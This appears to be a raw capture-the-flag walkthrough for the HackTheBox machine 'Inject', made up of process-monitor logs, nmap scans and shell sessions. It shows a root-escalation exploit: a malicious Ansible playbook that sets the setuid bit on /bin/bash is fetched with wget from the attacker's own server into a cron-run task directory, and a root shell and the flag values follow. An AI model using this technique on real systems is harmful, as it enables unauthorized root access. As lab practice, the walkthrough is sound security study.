2023/03/30 09:28:27 CMD: UID=0     PID=18189  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:27 CMD: UID=0     PID=18188  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:27 CMD: UID=0     PID=18187  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:27 CMD: UID=0     PID=18186  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:27 CMD: UID=0     PID=18185  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:27 CMD: UID=0     PID=18184  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:27 CMD: UID=0     PID=18183  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:27 CMD: UID=0     PID=18182  | /lib/systemd/systemd-udevd 
2023/03/30 09:28:27 CMD: UID=0     PID=18181  | 
2023/03/30 09:29:59 CMD: UID=1001  PID=18203  | cat 
2023/03/30 09:30:00 CMD: UID=1001  PID=18204  | ls --color=auto 
2023/03/30 09:30:01 CMD: UID=0     PID=18212  | /bin/sh -c /usr/bin/rm -rf /tmp/*.yml /dev/shm/*.yml 
2023/03/30 09:30:01 CMD: UID=0     PID=18211  | /usr/sbin/CRON -f 
2023/03/30 09:30:01 CMD: UID=0     PID=18210  | /bin/sh -c /usr/bin/rm -rf /tmp/*.yml /dev/shm/*.yml 
2023/03/30 09:30:01 CMD: UID=0     PID=18209  | /usr/sbin/CRON -f 
2023/03/30 09:30:01 CMD: UID=0     PID=18208  | /usr/sbin/CRON -f 
2023/03/30 09:30:01 CMD: UID=0     PID=18207  | /usr/sbin/CRON -f 
2023/03/30 09:30:01 CMD: UID=0     PID=18206  | /usr/sbin/CRON -f 
2023/03/30 09:30:01 CMD: UID=0     PID=18205  | /usr/sbin/CRON -f 
2023/03/30 09:30:01 CMD: UID=0     PID=18213  | /usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/playbook_1.yml /opt/automation/tasks/playbook_2.yml 
2023/03/30 09:30:01 CMD: UID=0     PID=18215  | /bin/sh -c sleep 10 && /usr/bin/rm -rf /opt/automation/tasks/* && /usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/ 
2023/03/30 09:30:01 CMD: UID=0     PID=18214  | /bin/sh -c sleep 10 && /usr/bin/rm -rf /opt/automation/tasks/* && /usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/ 
2023/03/30 09:30:01 CMD: UID=0     PID=18216  | 
2023/03/30 09:30:01 CMD: UID=0     PID=18217  | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml 
2023/03/30 09:30:01 CMD: UID=0     PID=18219  | /usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/playbook_1.yml /opt/automation/tasks/playbook_2.yml 
2023/03/30 09:30:02 CMD: UID=0     PID=18221  | 
2023/03/30 09:30:02 CMD: UID=0     PID=18222  | uname -p 
2023/03/30 09:30:02 CMD: UID=0     PID=18223  | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_2.yml 
2023/03/30 09:30:02 CMD: UID=0     PID=18224  | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_2.yml 
2023/03/30 09:30:02 CMD: UID=0     PID=18225  | 
2023/03/30 09:30:02 CMD: UID=0     PID=18227  | ssh -o ControlPersist 
2023/03/30 09:30:02 CMD: UID=0     PID=18228  | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml 
2023/03/30 09:30:02 CMD: UID=0     PID=18229  | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml 
2023/03/30 09:30:02 CMD: UID=0     PID=18230  | /bin/sh -c /bin/sh -c 'echo ~root && sleep 0' 
2023/03/30 09:30:02 CMD: UID=0     PID=18231  | /bin/sh -c echo ~root && sleep 0 
2023/03/30 09:30:02 CMD: UID=0     PID=18232  | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml 
2023/03/30 09:30:02 CMD: UID=0     PID=18233  | /bin/sh -c /bin/sh -c '( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317 `" && echo ansible-tmp-1680168602.9495137-18228-167856110577317="` echo /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317 `" ) && sleep 0'                                                                                                                                                               
2023/03/30 09:30:02 CMD: UID=0     PID=18236  | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317 `" && echo ansible-tmp-1680168602.9495137-18228-167856110577317="` echo /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317 `" ) && sleep 0                                                                                                                                                                            
2023/03/30 09:30:02 CMD: UID=0     PID=18234  | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317 `" && echo ansible-tmp-1680168602.9495137-18228-167856110577317="` echo /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317 `" ) && sleep 0                                                                                                                                                                            
2023/03/30 09:30:02 CMD: UID=0     PID=18237  | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317 `" && echo ansible-tmp-1680168602.9495137-18228-167856110577317="` echo /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317 `" ) && sleep 0                                                                                                                                                                            
2023/03/30 09:30:02 CMD: UID=0     PID=18238  | mkdir /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317 
2023/03/30 09:30:02 CMD: UID=0     PID=18239  | 
2023/03/30 09:30:02 CMD: UID=0     PID=18240  | 
2023/03/30 09:30:03 CMD: UID=0     PID=18241  | 
2023/03/30 09:30:03 CMD: UID=0     PID=18242  | /bin/sh -c chmod u+x /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317/ /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317/AnsiballZ_setup.py && sleep 0                                                                                                               
2023/03/30 09:30:03 CMD: UID=0     PID=18243  | chmod u+x /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317/ /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317/AnsiballZ_setup.py                                                                                                                                     
2023/03/30 09:30:03 CMD: UID=0     PID=18244  | sleep 0 
2023/03/30 09:30:03 CMD: UID=0     PID=18245  | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml 
2023/03/30 09:30:03 CMD: UID=0     PID=18246  | /bin/sh -c /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317/AnsiballZ_setup.py && sleep 0                                                                                                                                                                                 
2023/03/30 09:30:03 CMD: UID=0     PID=18247  | /bin/sh -c /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317/AnsiballZ_setup.py && sleep 0                                                                                                                                                                                 
2023/03/30 09:30:03 CMD: UID=0     PID=18248  | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317/AnsiballZ_setup.py 
2023/03/30 09:30:03 CMD: UID=0     PID=18251  | 
2023/03/30 09:30:03 CMD: UID=0     PID=18252  | 
2023/03/30 09:30:03 CMD: UID=0     PID=18253  | 
2023/03/30 09:30:03 CMD: UID=0     PID=18254  | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317/AnsiballZ_setup.py 
2023/03/30 09:30:03 CMD: UID=0     PID=18255  | 
2023/03/30 09:30:03 CMD: UID=0     PID=18256  | 
2023/03/30 09:30:03 CMD: UID=0     PID=18257  | 
2023/03/30 09:30:03 CMD: UID=0     PID=18258  | 
2023/03/30 09:30:03 CMD: UID=0     PID=18259  | 
2023/03/30 09:30:03 CMD: UID=0     PID=18260  | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317/AnsiballZ_setup.py 
2023/03/30 09:30:03 CMD: UID=0     PID=18261  | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317/AnsiballZ_setup.py 
2023/03/30 09:30:03 CMD: UID=0     PID=18262  | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317/AnsiballZ_setup.py 
2023/03/30 09:30:03 CMD: UID=0     PID=18263  | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317/AnsiballZ_setup.py 
2023/03/30 09:30:03 CMD: UID=0     PID=18264  | 
2023/03/30 09:30:03 CMD: UID=0     PID=18265  | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317/AnsiballZ_setup.py 
2023/03/30 09:30:03 CMD: UID=0     PID=18266  | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317/AnsiballZ_setup.py 
2023/03/30 09:30:03 CMD: UID=0     PID=18267  | /sbin/vgs --noheadings --nosuffix --units g --separator , 
2023/03/30 09:30:04 CMD: UID=0     PID=18268  | /sbin/lvs --noheadings --nosuffix --units g --separator , 
2023/03/30 09:30:04 CMD: UID=0     PID=18269  | /sbin/pvs --noheadings --nosuffix --units g --separator , 
2023/03/30 09:30:04 CMD: UID=0     PID=18270  | 
2023/03/30 09:30:04 CMD: UID=0     PID=18271  | 
2023/03/30 09:30:04 CMD: UID=0     PID=18277  | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317/AnsiballZ_setup.py 
2023/03/30 09:30:04 CMD: UID=0     PID=18278  | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317/AnsiballZ_setup.py 
2023/03/30 09:30:04 CMD: UID=0     PID=18279  | 
2023/03/30 09:30:04 CMD: UID=0     PID=18280  | /usr/bin/python3 -Es /usr/bin/lsb_release -a 
2023/03/30 09:30:04 CMD: UID=0     PID=18281  | 
2023/03/30 09:30:04 CMD: UID=0     PID=18282  | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317/AnsiballZ_setup.py 
2023/03/30 09:30:04 CMD: UID=0     PID=18283  | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317/AnsiballZ_setup.py 
2023/03/30 09:30:04 CMD: UID=0     PID=18284  | 
2023/03/30 09:30:04 CMD: UID=0     PID=18285  | 
2023/03/30 09:30:04 CMD: UID=0     PID=18288  | 
2023/03/30 09:30:04 CMD: UID=0     PID=18289  | 
2023/03/30 09:30:04 CMD: UID=0     PID=18292  | sleep 0 
2023/03/30 09:30:04 CMD: UID=0     PID=18293  | 
2023/03/30 09:30:04 CMD: UID=0     PID=18294  | 
2023/03/30 09:30:04 CMD: UID=0     PID=18295  | rm -f -r /root/.ansible/tmp/ansible-tmp-1680168602.9495137-18228-167856110577317/ 
2023/03/30 09:30:04 CMD: UID=0     PID=18296  | 
2023/03/30 09:30:04 CMD: UID=0     PID=18298  | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml 
2023/03/30 09:30:04 CMD: UID=0     PID=18299  | 
2023/03/30 09:30:04 CMD: UID=0     PID=18300  | /bin/sh -c /bin/sh -c 'echo ~root && sleep 0' 
2023/03/30 09:30:04 CMD: UID=0     PID=18301  | sleep 0 
2023/03/30 09:30:04 CMD: UID=0     PID=18302  | 
2023/03/30 09:30:04 CMD: UID=0     PID=18303  | /bin/sh -c /bin/sh -c '( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076 `" && echo ansible-tmp-1680168604.658938-18298-60739026186076="` echo /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076 `" ) && sleep 0'                                                                                                                                                                     
2023/03/30 09:30:04 CMD: UID=0     PID=18306  | mkdir -p /root/.ansible/tmp 
2023/03/30 09:30:04 CMD: UID=0     PID=18304  | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076 `" && echo ansible-tmp-1680168604.658938-18298-60739026186076="` echo /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076 `" ) && sleep 0 
2023/03/30 09:30:04 CMD: UID=0     PID=18307  | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076 `" && echo ansible-tmp-1680168604.658938-18298-60739026186076="` echo /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076 `" ) && sleep 0 
2023/03/30 09:30:04 CMD: UID=0     PID=18308  | mkdir /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076 
2023/03/30 09:30:04 CMD: UID=0     PID=18309  | 
2023/03/30 09:30:04 CMD: UID=0     PID=18310  | sleep 0 
2023/03/30 09:30:05 CMD: UID=0     PID=18311  | 
2023/03/30 09:30:05 CMD: UID=0     PID=18312  | /bin/sh -c chmod u+x /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076/ /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076/AnsiballZ_systemd.py && sleep 0                                                                                                                 
2023/03/30 09:30:05 CMD: UID=0     PID=18313  | /bin/sh -c chmod u+x /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076/ /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076/AnsiballZ_systemd.py && sleep 0                                                                                                                 
2023/03/30 09:30:05 CMD: UID=0     PID=18314  | /bin/sh -c chmod u+x /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076/ /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076/AnsiballZ_systemd.py && sleep 0                                                                                                                 
2023/03/30 09:30:05 CMD: UID=0     PID=18315  | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml 
2023/03/30 09:30:05 CMD: UID=0     PID=18316  | /bin/sh -c /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076/AnsiballZ_systemd.py && sleep 0                                                                                                                                                                                 
2023/03/30 09:30:05 CMD: UID=0     PID=18317  | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076/AnsiballZ_systemd.py 
2023/03/30 09:30:05 CMD: UID=0     PID=18318  | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076/AnsiballZ_systemd.py 
2023/03/30 09:30:05 CMD: UID=0     PID=18319  | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076/AnsiballZ_systemd.py 
2023/03/30 09:30:05 CMD: UID=0     PID=18320  | 
2023/03/30 09:30:05 CMD: UID=0     PID=18321  | /bin/sh -c /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076/AnsiballZ_systemd.py && sleep 0                                                                                                                                                                                 
2023/03/30 09:30:05 CMD: UID=0     PID=18322  | 
2023/03/30 09:30:05 CMD: UID=0     PID=18323  | /bin/sh -c rm -f -r /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076/ > /dev/null 2>&1 && sleep 0 
2023/03/30 09:30:05 CMD: UID=0     PID=18324  | rm -f -r /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076/ 
2023/03/30 09:30:05 CMD: UID=0     PID=18325  | /bin/sh -c rm -f -r /root/.ansible/tmp/ansible-tmp-1680168604.658938-18298-60739026186076/ > /dev/null 2>&1 && sleep 0 
2023/03/30 09:30:05 CMD: UID=1001  PID=18328  | cat playbook_2.yml 
2023/03/30 09:30:11 CMD: UID=0     PID=18329  | /usr/bin/rm -rf /opt/automation/tasks/playbook_1.yml /opt/automation/tasks/playbook_2.yml 
2023/03/30 09:30:11 CMD: UID=0     PID=18330  | 

find

2023/03/30 09:30:01 CMD: UID=0 PID=18213 | /usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/playbook_1.yml /opt/automation/tasks/playbook_2.yml
2023/03/30 09:30:01 CMD: UID=0 PID=18215 | /bin/sh -c sleep 10 && /usr/bin/rm -rf /opt/automation/tasks/* && /usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/
2023/03/30 09:30:01 CMD: UID=0 PID=18214 | /bin/sh -c sleep 10 && /usr/bin/rm -rf /opt/automation/tasks/* && /usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/
2023/03/30 09:30:01 CMD: UID=0 PID=18216 |
2023/03/30 09:30:01 CMD: UID=0 PID=18217 | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
2023/03/30 09:30:01 CMD: UID=0 PID=18219 | /usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/playbook_1.yml /opt/automation/tasks/playbook_2.yml
2023/03/30 09:30:02 CMD: UID=0 PID=18221 |
2023/03/30 09:30:02 CMD: UID=0 PID=18222 | uname -p
2023/03/30 09:30:02 CMD: UID=0 PID=18223 | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_2.yml
2023/03/30 09:30:02 CMD: UID=0 PID=18224 | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_2.yml

so

┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$ cat playbook_2.yml                                   
- hosts:  localhosttasks:- name: become rootcommand: chmod u+s /bin/bashbecome: true
──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$ python3 -m http.server 3333
Serving HTTP on 0.0.0.0 port 3333 (http://0.0.0.0:3333/) ...10.10.11.204 - - [30/Mar/2023 17:11:05] "GET /pspy64 HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 17:27:25] "GET /pspy64 HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 17:33:39] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 17:35:20] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 17:37:53] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 17:47:23] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 17:50:03] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 17:54:48] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 17:59:58] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 18:00:03] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 18:00:07] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 18:00:12] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 18:00:17] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 18:00:25] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 18:00:30] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 18:00:35] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 18:00:43] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 18:00:55] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 18:01:27] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 18:01:59] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 18:02:34] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 18:13:47] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 18:13:52] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 18:15:01] "GET /playbook_2.yml HTTP/1.1" 200 -
10.10.11.204 - - [30/Mar/2023 18:15:07] "GET /playbook_2.yml HTTP/1.1" 200 -

download into /opt/automation/tasks/ many times! so get the root!

phil@inject:/$ cd
cd
phil@inject:~$ cd /opt/automation/tasks/
cd /opt/automation/tasks/
phil@inject:/opt/automation/tasks$ wget http://10.10.16.3:3333/playbook_2.yml
wget http://10.10.16.3:3333/playbook_2.yml
--2023-03-30 09:33:43--  http://10.10.16.3:3333/playbook_2.yml
Connecting to 10.10.16.3:3333... connected.
HTTP request sent, awaiting response... 200 OK
Length: 132 [application/octet-stream]
Saving to: ‘playbook_2.yml’playbook_2.yml      100%[===================>]     132  --.-KB/s    in 0s      2023-03-30 09:33:45 (5.15 MB/s) - ‘playbook_2.yml’ saved [132/132]phil@inject:/opt/automation/tasks$ ls
ls
playbook_1.yml  playbook_2.yml
phil@inject:/opt/automation/tasks$ ls -al
ls -al
total 16
drwxrwxr-x 2 root staff 4096 Mar 30 09:33 .
drwxr-xr-x 3 root root  4096 Oct 20 04:23 ..
-rw-r--r-- 1 root root   150 Mar 30 09:32 playbook_1.yml
-rw-rw-r-- 1 phil phil   132 Mar 30 09:24 playbook_2.yml
phil@inject:/opt/automation/tasks$ id
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
phil@inject:/opt/automation/tasks$ id
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
phil@inject:/opt/automation/tasks$ id
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
phil@inject:/opt/automation/tasks$ id
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
phil@inject:/opt/automation/tasks$ id
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
phil@inject:/opt/automation/tasks$ id
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
phil@inject:/opt/automation/tasks$ ls
ls
playbook_1.yml
phil@inject:/opt/automation/tasks$ id
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
phil@inject:/opt/automation/tasks$ id
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
phil@inject:/opt/automation/tasks$ ls
ls
playbook_1.yml
phil@inject:/opt/automation/tasks$ wget http://10.10.16.3:3333/playbook_2.yml
wget http://10.10.16.3:3333/playbook_2.yml
--2023-03-30 09:35:21--  http://10.10.16.3:3333/playbook_2.yml
Connecting to 10.10.16.3:3333... connected.
HTTP request sent, awaiting response... 200 OK
Length: 132 [application/octet-stream]
Saving to: ‘playbook_2.yml’playbook_2.yml      100%[===================>]     132  --.-KB/s    in 0s      2023-03-30 09:35:22 (7.96 MB/s) - ‘playbook_2.yml’ saved [132/132]phil@inject:/opt/automation/tasks$ id
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
phil@inject:/opt/automation/tasks$ id
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
phil@inject:/opt/automation/tasks$ id
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
phil@inject:/opt/automation/tasks$ id
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
phil@inject:/opt/automation/tasks$ id
idphil@inject:/opt/automation/tasks$ id
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
phil@inject:/opt/automation/tasks$ id
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
phil@inject:/opt/automation/tasks$ /bin/bash -p
/bin/bash -p
bash-5.0# id
id
uid=1001(phil) gid=1001(phil) euid=0(root) groups=1001(phil),50(staff)
bash-5.0# cat /root/root.txt
cat /root/root.txt
b13309abe52e739588c21a67c3e72d42
bash-5.0# cat /home/phil/user.txt
cat /home/phil/user.txt
db101b862811be45bc97262357d34b05

the other roads

┌──(kwkl㉿kwkl)-[/usr/share/metasploit-framework/tools/exploit]
└─$ nmap -p- -sT --min-rate=1000 -Pn 10.10.11.204                                                                                                       130 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-30 19:39 HKT┌──(kwkl㉿kwkl)-[/usr/share/metasploit-framework/tools/exploit]
└─$ nmap -p- -sT --min-rate=1000 -Pn 10.10.11.204                                                                                                       130 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-30 19:43 HKT
Nmap scan report for inject (10.10.11.204)
Host is up (0.044s latency).
All 65535 scanned ports on inject (10.10.11.204) are in ignored states.
Not shown: 64451 filtered tcp ports (no-response), 1084 filtered tcp ports (host-unreach)Nmap done: 1 IP address (1 host up) scanned in 88.91 seconds┌──(kwkl㉿kwkl)-[/usr/share/metasploit-framework/tools/exploit]
└─$ nmap -p- -sT --min-rate=1000 -Pn 10.10.11.204
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-30 19:50 HKT
Warning: 10.10.11.204 giving up on port because retransmission cap hit (10).
Nmap scan report for inject (10.10.11.204)
Host is up (0.35s latency).
Not shown: 55932 closed tcp ports (conn-refused), 9601 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxyNmap done: 1 IP address (1 host up) scanned in 222.47 seconds┌──(kwkl㉿kwkl)-[/usr/share/metasploit-framework/tools/exploit]
└─$ nmap -p- -sU --min-rate=1000 -Pn 10.10.11.204  
You requested a scan type which requires root privileges.
QUITTING!┌──(kwkl㉿kwkl)-[/usr/share/metasploit-framework/tools/exploit]
└─$ sudo nmap -p- -sU --min-rate=1000 -Pn 10.10.11.204                                                                                                    1[sudo] kwkl 的密码:
对不起,请重试。
[sudo] kwkl 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-30 19:55 HKT
Warning: 10.10.11.204 giving up on port because retransmission cap hit (10).
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for inject (10.10.11.204)
Host is up (0.58s latency).
All 65535 scanned ports on inject (10.10.11.204) are in ignored states.
Not shown: 64829 open|filtered udp ports (no-response), 706 closed udp ports (port-unreach)Nmap done: 1 IP address (1 host up) scanned in 734.43 seconds┌──(kwkl㉿kwkl)-[/usr/share/metasploit-framework/tools/exploit]
└─$ nmap -p22,8080 -sC -sV -O -sT 10.10.11.204  
TCP/IP fingerprinting (for OS scan) requires root privileges.
QUITTING!┌──(kwkl㉿kwkl)-[/usr/share/metasploit-framework/tools/exploit]
└─$ sudo nmap -p22,8080 -sC -sV -O -sT 10.10.11.204                                                                                                       1[sudo] kwkl 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-30 20:30 HKT
Nmap scan report for inject (10.10.11.204)
Host is up (1.3s latency).PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
